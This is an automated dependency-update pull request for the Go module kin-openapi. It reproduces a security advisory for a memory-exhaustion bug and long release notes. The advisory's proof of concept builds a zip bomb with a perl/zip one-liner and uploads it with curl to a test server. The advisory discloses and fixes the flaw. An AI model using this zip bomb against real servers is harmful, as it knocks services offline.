Update module github.com/getkin/kin-openapi to v0.131.0 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
github.com/getkin/kin-openapi	v0.108.0 -> v0.131.0

GitHub Vulnerability Alerts

CVE-2025-30153

Summary

When validating a request with a multipart/form-data schema, if the OpenAPI schema allows it, an attacker can upload a crafted ZIP file (e.g., a ZIP bomb), causing the server to consume all available system memory.

Details

The root cause comes from the ZipFileBodyDecoder, which is registered automatically by the module (contrary to what the documentation says.

PoC

To reproduce the vulnerability, you can use the following OpenAPI schema:

openapi: 3.0.0
info:
  title: 'Validator'
  version: 0.0.1
paths:
  /:
    post:
      requestBody:
        required: true
        content:
          multipart/form-data:
            schema:
              type: object
              required:
                - file
              properties:
                file:
                  type: string
                  format: binary
      responses:
        '200':
          description: Created

And this code to validate the request (nothing fancy, it basically only calls the openapi3filter.ValidateRequest function`):

package main

import (
	"fmt"
	"log"
	"net/http"

	"github.com/getkin/kin-openapi/openapi3filter"
	legacyrouter "github.com/getkin/kin-openapi/routers/legacy"

	"github.com/getkin/kin-openapi/openapi3"
)

func handler(w http.ResponseWriter, r *http.Request) {
	loader := openapi3.NewLoader()

	doc, err := loader.LoadFromFile("schema.yaml")
	if err != nil {
		http.Error(w, "Failed to load OpenAPI document", http.StatusInternalServerError)
		return
	}

	if err := doc.Validate(r.Context()); err != nil {
		http.Error(w, "Invalid OpenAPI document", http.StatusBadRequest)
		return
	}

	router, err := legacyrouter.NewRouter(doc)
	if err != nil {
		http.Error(w, "Failed to create router", http.StatusInternalServerError)
		return
	}

	route, pathParams, err := router.FindRoute(r)
	if err != nil {
		http.Error(w, "Failed to find route", http.StatusNotFound)
		return
	}

	input := &openapi3filter.RequestValidationInput{
		Request:     r,
		QueryParams: r.URL.Query(),
		Route:       route,
		PathParams:  pathParams,
	}

	if err := openapi3filter.ValidateRequest(r.Context(), input); err != nil {
		http.Error(w, fmt.Sprintf("Request validation failed: %v", err), http.StatusBadRequest)
		return
	}

	w.Write([]byte("request ok !"))
}

func main() {
	http.HandleFunc("/", handler)
	log.Fatal(http.ListenAndServe(":8080", nil))

}

We also need to create a zip bomb. This command will create a 4.7GB file and compress it to to 4.7MB zip archive:

perl -e 'print "0" x 5000000000' > /tmp/bigfile.txt; zip -9 /tmp/bomb.zip /tmp/bigfile.txt

Run the PoC provided, and upload the zip bomb with curl localhost:8080/ -F file="@​/tmp/bomb.zip;type=application/zip" -v.

Observe the memory consumption of the test server during and after the upload (it jumped to a bit over 22GB in my testing, with only a 4.7MB input file, you can reduce the size of the generated file to not kill your test machine when reproducing.)

Impact

An attacker can trigger an out-of-memory (OOM) condition, leading to server crashes or degraded performance.
It seems to only be exploitable if the OpenAPI schema allows for multipart upload.

Remediation

I see at least 2 potential fixes/improvements:

• Do not register by default the zip file decoder (I honestly was a bit surprised to see it was enabled by default, it seems to be quite a niche use-case ?)
• Update ZipFileBodyDecoder to enforce a maximum size of the decompressed archive and bailout as soon as it's reached (probably with a small default value and allow the users to configure it through the input options ?)

---

Release Notes

getkin/kin-openapi (github.com/getkin/kin-openapi)

v0.131.0

Compare Source

What's Changed

• openapi3filter: de-register ZipFileBodyDecoder and make a few decoders public by @​fenollp in #​1059

Full Changelog: getkin/kin-openapi@v0.130.0...v0.131.0

v0.130.0

Compare Source

What's Changed

• feat(openapi3gen): Customize json.RawMessage by @​kyleconroy in #​1050
• openapi3gen: Fix issue with separate component generated for time.Time by @​d1vbyz3r0 in #​1052
• openapi3filter: Remove redundant ExcludeResponseBody check by @​tatsumack in #​1056
• openapi3: use origin to minimize collisions by @​reuvenharrison in #​1057
• openapi3: delete origin keys only when IncludeOrigin=true by @​reuvenharrison in #​1055
• openapi3filter: apply default values of an array in a query param with exploded = false by @​nhochstr in #​1054

New Contributors

• @​kyleconroy made their first contribution in #​1050
• @​d1vbyz3r0 made their first contribution in #​1052
• @​tatsumack made their first contribution in #​1056
• @​nhochstr made their first contribution in #​1054

Full Changelog: getkin/kin-openapi@v0.129.0...v0.130.0

v0.129.0

Compare Source

What's Changed

• README: add Fuego to dependents by @​EwenQuim in #​1017
• openapi3: skip a test in CI to avoid 403s from some remote server by @​fenollp in #​1019
• openapi3: introduce StringMap type to enable unmarshalling of maps with Origin by @​reuvenharrison in #​1018
• openapi3: reference originating locations in YAML specs - step 1 by @​reuvenharrison in #​1007
• openapi3: reference originating locations in YAML specs - step 2 by @​reuvenharrison in #​1024
• openapi3: process discriminator mapping values as refs by @​jgresty in #​1022
• openapi3filter: register decoder for other JSON content types by @​oliverli in #​1026
• Revert "openapi3: process discriminator mapping values as refs" by @​fenollp in #​1029
• openapi3: fail to load spec because of schema names in mapping by @​reuvenharrison in #​1027
• openapi2conv: convert schemaRef for additional props by @​jayanth-tatina-groww in #​1030
• openapi3: simplify by replacing math.Min with min by @​alexandear in #​1032
• openapi3: fix deprecation comments by @​alexandear in #​1034
• test: fix expected-actual parameters in require.Equal by @​alexandear in #​1035
• use forked yaml modules without "replace" by @​reuvenharrison in #​1038
• openapi3: update date schema formats to not match months or days of '00' by @​RulerOfTheQueendom in #​1042
• openapi3,openapi3filter: replace interface{} with any by @​alexandear in #​1040
• openapi3filter: Simplify ValidateRequest implementation by @​alexandear in #​1041
• openapi3filter: validation of x-www-form-urlencoded with arbitrary nested allOf by @​mikhalytch in #​1046
• openapi2conv: convert references in nested additionalProperties schemas by @​travisnewhouse in #​1047

New Contributors

• @​EwenQuim made their first contribution in #​1017
• @​jgresty made their first contribution in #​1022
• @​oliverli made their first contribution in #​1026
• @​jayanth-tatina-groww made their first contribution in #​1030
• @​RulerOfTheQueendom made their first contribution in #​1042
• @​mikhalytch made their first contribution in #​1046
• @​travisnewhouse made their first contribution in #​1047

Full Changelog: getkin/kin-openapi@v0.128.0...v0.129.0

v0.128.0

Compare Source

What's Changed

• openapi3filter: Fix default value for array in for query param by @​Tommy-42 in #​1000
• Add github.com/pb33f/libopenapi by @​Jille in #​1004
• Introduce an option to override the regex implementation by @​alexbakker in #​1006
• make form required field order deterministic by @​jlsherrill in #​1008
• openapi2: fix un/marshalling discriminator field by @​reversearrow in #​1011

New Contributors

• @​Tommy-42 made their first contribution in #​1000
• @​Jille made their first contribution in #​1004
• @​alexbakker made their first contribution in #​1006
• @​jlsherrill made their first contribution in #​1008

Full Changelog: getkin/kin-openapi@v0.127.0...v0.128.0

v0.127.0

Compare Source

What's Changed

• openapi3: include local reference parts in refPath saved by @​percivalalb in #​978
• fix: update type: file to type: string and format: binary by @​reversearrow in #​980
• test: add a test for #​499 by @​AnatolyRugalev in #​982
• test: add a test for #​961 by @​AnatolyRugalev in #​981
• openapi3gen: generate "nullable: true" for pointers by @​endertunc in #​987
• openapi3filter: Remove inconsistency for arrays in queries by @​TheSadlig in #​990
• openapi3filter: remove double call by @​AriehSchneier in #​993
• openapi3filter: Fix default arrays application for query parameters by @​TheSadlig in #​992
• routers: downgrade gorilla/mux to v1.8.0 for #​988 by @​fenollp in #​996
• openapi3: export ComponentRef for usage in RefNameResolver by @​fenollp in #​998
• Add note on gorillamux by @​fenollp in #​999

New Contributors

• @​reversearrow made their first contribution in #​980
• @​endertunc made their first contribution in #​987
• @​TheSadlig made their first contribution in #​990

Full Changelog: getkin/kin-openapi@v0.126.0...v0.127.0

v0.126.0

Compare Source

What's Changed

• openapi3: document v0.124.0 breaking API changes by @​percivalalb in #​964
• openapi3: introduce ReferencesComponentInRootDocument(doc *T, ref componentRef) (string, bool) by @​percivalalb in #​945
• Update Go module dependencies by @​percivalalb in #​965
• Move paragraph back to its correct section by @​percivalalb in #​967
• Replace interface{} with any by @​percivalalb in #​966
• openapi3: allow Extensions next to $ref in SchemaRef by @​paulmach in #​901
• openapi3: implement circular reference backtracking by @​AnatolyRugalev in #​970
• openapi3: improve ipv6 validation by @​AnatolyRugalev in #​971
• openapi3: resolve recursive file references by @​AnatolyRugalev in #​974
• openapi3: improve internalization ref naming to avoid collisions by @​percivalalb in #​955
• openapi3: add a test for additionalProperties: false validation by @​AnatolyRugalev in #​975
• openapi3: add support for number and integer format validators by @​AnatolyRugalev in #​976
• openapi3: allow YAML-marshaling invalid specs by @​fenollp in #​977

New Contributors

• @​paulmach made their first contribution in #​901
• @​AnatolyRugalev made their first contribution in #​970

Full Changelog: getkin/kin-openapi@v0.125.0...v0.126.0

v0.125.0

Compare Source

What's Changed

• Revert "openapi3gen: add CreateComponentSchemas option to export object schemas to components" and add with the correct contributors by @​EnriqueL8 in #​937
• openapi3: keep oneOf context in markSchemaErrorKey (#​940) by @​jordan-wu-97 in #​941
• docs: add github.com/a-h/rest to projects list by @​a-h in #​942
• openapi4filter: improve CSV resp decoder performance by @​mpoqq in #​948
• openapi3filter: ensure key matches param name before decoding in (*urlValuesDecoder) DecodeObject(..) by @​MateusFrFreitas in #​947
• openapi3: ensure YAML marshalling matches JSON's by @​damien-talos in #​943
• openapi{2,3}: surface both json/yaml unmarshal errors by @​timothympace in #​950
• openapi3(tests): use testify's YAMLEq function by @​percivalalb in #​954
• openapi3filter: add context to Validator Middleware's ErrFunc and LogFunc functions by @​crissi98 in #​953
• openapi3: move ref codegen to Go by @​percivalalb in #​956
• changelog: note API breakage from #​953 by @​fenollp in #​957
• openapi3: internalize refs for path parameters by @​selaux in #​960
• ci: drop CodeQL by @​fenollp in #​962

New Contributors

• @​EnriqueL8 made their first contribution in #​937
• @​jordan-wu-97 made their first contribution in #​941
• @​a-h made their first contribution in #​942
• @​mpoqq made their first contribution in #​948
• @​MateusFrFreitas made their first contribution in #​947
• @​damien-talos made their first contribution in #​943
• @​timothympace made their first contribution in #​950
• @​percivalalb made their first contribution in #​954
• @​crissi98 made their first contribution in #​953
• @​selaux made their first contribution in #​960

Full Changelog: getkin/kin-openapi@v0.124.0...v0.125.0

v0.124.0

Compare Source

What's Changed

• ci: make sure go-run'ing binaries works by @​fenollp in #​894
• Make the JSON body decode public by @​cdent in #​896
• add Delete operation to maplike structs by @​tcdsv in #​899
• openapi3filter: fix x-www-form-urlencoded decoder for oneOf, anyOf, and allOf by @​imtaketa in #​903
• openapi3filter: add Unwrap() method to SecurityRequirementsError by @​nickajacks1 in #​905
• Make Loader testable by @​reuvenharrison in #​906
• openapi3filter: support deepObject with nested objects and array parameters by @​danicc097 in #​911
• openapi2,3: support array of types in type field by @​brandonbloom in #​912
• openapi3: fix regex replacing \u literals by @​thiagownt in #​918
• openapi3filter: fix array of primitives query parameter types by @​danicc097 in #​921
• openapi3: Implement YAML Marshaler interface for AdditionalProperties by @​praneetloke in #​922
• openapi3filter: deepObject array of objects and array of arrays support by @​danicc097 in #​923
• openapi3gen: allow overriding how a Schema is generated by @​taufik-rama in #​920
• openapi3gen: rename example to show up in docs by @​fenollp in #​932
• openapi3: implement YAML Marshaller interface for paths and responses by @​nobbynobbs in #​931
• openapi3filter: some syntax tweaks by @​fenollp in #​933
• openapi3: tests for #​931 by @​fenollp in #​887
• openapi3filter: guard BodyEncoder registration behind a RW lock by @​fenollp in #​934
• openapi3gen: add CreateComponentSchemas option to export object schemas to components by @​fenollp in #​935

New Contributors

• @​cdent made their first contribution in #​896
• @​tcdsv made their first contribution in #​899
• @​imtaketa made their first contribution in #​903
• @​nickajacks1 made their first contribution in #​905
• @​brandonbloom made their first contribution in #​912
• @​thiagownt made their first contribution in #​918
• @​taufik-rama made their first contribution in #​920
• @​nobbynobbs made their first contribution in #​931

Full Changelog: getkin/kin-openapi@v0.123.0...v0.124.0

v0.123.0

Compare Source

What's Changed

• Update README.md by @​syordanov94 in #​881
• openapi3: optimize Unmarshal for maplike structs by @​fenollp in #​882
• feat(openapi3filter): add ExludeRequestQuery by @​zekth in #​886
• feat: support default value binding with allOfSchema by @​podhmo in #​885
• openapi3: fix abort logic of validation for schemas with anyOf, allOf, oneOf by @​AmadeusK525 in #​892
• cmd/validate: re-enable go run ...@​latest now that unsafe dep sums are dropped by @​fenollp in #​888

New Contributors

• @​syordanov94 made their first contribution in #​881
• @​podhmo made their first contribution in #​885

Full Changelog: getkin/kin-openapi@v0.122.0...v0.123.0

v0.122.0

Compare Source

What's Changed

• docs.sh: fix narrow docs checks spectrum by @​fenollp in #​877
• fix after #​870: make sure Bis does not surface up by @​fenollp in #​878
• openapi3: add support for extensions on the few types left by @​fenollp in #​763

Full Changelog: getkin/kin-openapi@v0.121.0...v0.122.0

v0.121.0

Compare Source

What's Changed

• Replace deprecated io/ioutil with io by @​alexandear in #​840
• fix compile errors in README example code by @​Jumpaku in #​842
• openapi3: add length of circular reference to error message by @​jamietanna in #​839
• openapi2conv: fix that removes an extra required array from formDataBody by @​liankui in #​848
• openapi3: fix schema validation for anyOf, allOf, oneOf operations by @​AmadeusK525 in #​850
• reproduce incorrect allOf + nullable behaviour by @​fenollp in #​253
• reproduce issue #​423 by @​fenollp in #​432
• openapi2conv: expose loader and location to ToV3 by @​AriehSchneier in #​851
• openAPI3 template T class add server helper function by @​spdrcd in #​852
• openapi3: handle tangible *nil in Schema.IsEmpty impl by @​fenollp in #​858
• openapi3: no longer error when drilling into a silenced yaml tag by @​fenollp in #​859
• openapi3: shave some tests by @​fenollp in #​862
• openapi3: refacto drill bit by @​fenollp in #​865
• openapi3: unify Loader.resolve*Ref impls by @​fenollp in #​863
• openapi3: refacto path resolving, remove a couple error cases by @​fenollp in #​864
• openapi3: fast path drilling into UFO-type refs by @​fenollp in #​866
• cmd/validate: read v2 documents that dont mention swagger as well by @​fenollp in #​868
• openapi3: save some allocs when checking extras in refs by @​fenollp in #​869
• openapi3: fix validating extra siblings in remote refs by @​fenollp in #​872
• openapi3: reclaims Extensions unused mem post-unmarshal by @​fenollp in #​871
• openapi3: handle refs missing fragment by @​fenollp in #​511
• openapi3: support \uC4FE codepoint syntax in Schema.Pattern by @​fenollp in #​873
• close #​594: yaml "control characters are not allowed" no longer reproducible by @​fenollp in #​597
• openapi{2,3}: simplify unmarshal errors by @​fenollp in #​870
• openapi3: refacto ref-resolving end conditions by @​fenollp in #​874
• openapi3: rename type of Components.Responses to ResponseBodies (from Responses) by @​fenollp in #​875
• openapi3: correct implementations of JSONLookup by @​fenollp in #​876

New Contributors

• @​Jumpaku made their first contribution in #​842
• @​jamietanna made their first contribution in #​839
• @​liankui made their first contribution in #​848
• @​AmadeusK525 made their first contribution in #​850
• @​AriehSchneier made their first contribution in #​851
• @​spdrcd made their first contribution in #​852

Full Changelog: getkin/kin-openapi@v0.120.0...v0.121.0

v0.120.0

Compare Source

What's Changed

• fix/ update version of go to 1.20 by @​lyndonhebditch-aviva in #​837
• openapi3: add missing document parameter validations by @​radwaretaltr in #​835
• Exclude gopkg.in/yaml.v3 v3.0.0 by @​natehart in #​838

New Contributors

• @​lyndonhebditch-aviva made their first contribution in #​837
• @​natehart made their first contribution in #​838

Full Changelog: getkin/kin-openapi@v0.119.0...v0.120.0

v0.119.0

Compare Source

What's Changed

• openapi3,routers: simplify code by @​alexandear in #​800
• lint: fix typos in comments, tests and README by @​alexandear in #​799
• openapi3: fix checks in tests by @​alexandear in #​801
• Add projectsveltos addon-controller by @​gianlucam76 in #​802
• openapi3: fix links to JSONPointable iface by @​fenollp in #​803
• openapi3: late Spring cleanup by @​fenollp in #​804
• openapi3: split info.go three ways by @​fenollp in #​805
• openapi3filter: simplify validation test by @​alexandear in #​806
• openapi3,openapi3filter: refactor bytes.Buffer creation by @​alexandear in #​807
• openapi3: spell "marshal" with one "l" for consistency by @​alexandear in #​808
• openapi3: refactor tests: use BoolPtr, require.Same by @​alexandear in #​809
• openapi3,openapi3filter: fix typos in comments, tests by @​alexandear in #​810
• openapi3: fix #​775 race on schema pattern regex compilation by @​fenollp in #​811
• openapi3: move helpers to their own dedicated file by @​fenollp in #​813
• cmd/validate: support setting openapi3.CircularReferenceCounter by @​fenollp in #​815
• Support loading from stdin by @​const-tmp in #​820
• Fix Enum Query Parameters by @​mgross-ebner in #​822
• Use os.ReadFile instead of ioutil.ReadFile by @​fenollp in #​691
• sponsor: Speakeasy Rebrand by @​fenollp in #​826
• openapi3: support patterned fields in Responses (#​819) by @​mgirouard in #​827
• sponsor: toggle logo in dark/light modes by @​fenollp in #​829
• openapi3: fix format error when Header marshal to YAML by @​caixw in #​823
• openapi3: fix func doc after #​823 by @​fenollp in #​830
• openapi3: fix ref internalization by @​radwaretaltr in #​832

New Contributors

• @​gianlucam76 made their first contribution in #​802
• @​const-tmp made their first contribution in #​820
• @​mgross-ebner made their first contribution in #​822
• @​mgirouard made their first contribution in #​827
• @​caixw made their first contribution in #​823

Full Changelog: getkin/kin-openapi@v0.118.0...v0.119.0

v0.118.0

Compare Source

What's Changed

• fix crash on load by @​reuvenharrison in #​795
• openapi3: fix #​796 infinite loop during document validation by @​radwaretaltr in #​797

New Contributors

• @​radwaretaltr made their first contribution in #​797

Full Changelog: getkin/kin-openapi@v0.117.0...v0.118.0

v0.117.0

Compare Source

What's Changed

• openapi3gen: fix panic when embedded type is not a struct by @​nrwiersma in #​792
• openapi3filter: fix oneOF validation in query params by @​ju-zp in #​790

New Contributors

• @​ju-zp made their first contribution in #​790

Full Changelog: getkin/kin-openapi@v0.116.0...v0.117.0

v0.116.0

Compare Source

What's Changed

• feat: support nil uuid by @​zekth in #​778
• openapi3filter: introduce func ConvertErrors(err error) error by @​QifanWuCFLT in #​783
• openapi3filter: drop useless DefaultOptions by @​fenollp in #​785

New Contributors

• @​QifanWuCFLT made their first contribution in #​783

Full Changelog: getkin/kin-openapi@v0.115.0...v0.116.0

v0.115.0

Compare Source

What's Changed

• cmd/validate: more expressive errors by @​fenollp in #​769
• openapi3: fix an infinite loop that may have been introduced in #​700 by @​fenollp in #​768
• openapi3: fix default values count even when disabled (#​767) by @​orshlom in #​770
• openapi3: sort extra fields only once, during deserialization by @​fenollp in #​773

Full Changelog: getkin/kin-openapi@v0.114.0...v0.115.0

v0.114.0

Compare Source

What's Changed

• Fix additional properties false not validated by @​ori-shalom in #​747
• Refine schema error reason message by @​ori-shalom in #​748
• openapi3: fix validation of non-empty interface slice value against array schema by @​andrewyang96 in #​752
• openapi3: empty scopes are valid by @​nodar963 in #​754
• openapi3: fix integer enum schema validation after json.Number PR by @​k2tzumi in #​755
• optional readOnly and writeOnly validations by @​orshlom in #​758
• openapi3: fix resolving Callbacks by @​ShouheiNishi in #​757
• fixup some coding style divergences by @​fenollp in #​760
• openapi3: make bad data ... error more actionable by @​fenollp in #​761
• openapi3: add test from #​731 showing validating doc first is required by @​fenollp in #​762

New Contributors

• @​andrewyang96 made their first contribution in #​752
• @​nodar963 made their first contribution in #​754
• @​orshlom made their first contribution in #​758

Full Changelog: getkin/kin-openapi@v0.113.0...v0.114.0

v0.113.0

Compare Source

What's Changed

• openapi3: remove email string format by @​zekth in #​727
• openapi3filter: support for allOf request schema in multipart/form-data by @​k2tzumi in #​729
• Disallow unexpected fields in validation and drop jsoninfo package by @​fenollp in #​728
• openapi3filter: RegisterBodyDecoder for application/zip by @​k2tzumi in #​730
• Keep track of API changes with CI by @​fenollp in #​732
• openapi3filter: RegisterBodyDecoder for text/csv by @​k2tzumi in #​734
• #​741 uri cache mutex by @​grahamcrowell in #​742
• Specify UseNumber() in the JSON decoder during JSON validation by @​ShouheiNishi in #​738
• openapi3: fix error phrase in security scheme by @​Jefftree in #​745
• openapi3: remove value data from SchemaError.Reason field by @​ori-shalom in #​737

New Contributors

• @​zekth made their first contribution in #​727
• @​k2tzumi made their first contribution in #​729
• @​grahamcrowell made their first contribution in #​742
• @​Jefftree made their first contribution in #​745
• @​ori-shalom made their first contribution in #​737

Full Changelog: getkin/kin-openapi@v0.112.0...v0.113.0

[v0.112.0](https://redirect.github.com/get

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

ℹ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

• 2 additional dependencies were updated
• The go directive was updated for compatibility reasons

Details:

Package	Change
go	1.21 -> 1.22.5
github.com/go-openapi/jsonpointer	v0.19.5 -> v0.21.0
github.com/go-openapi/swag	v0.21.1 -> v0.23.0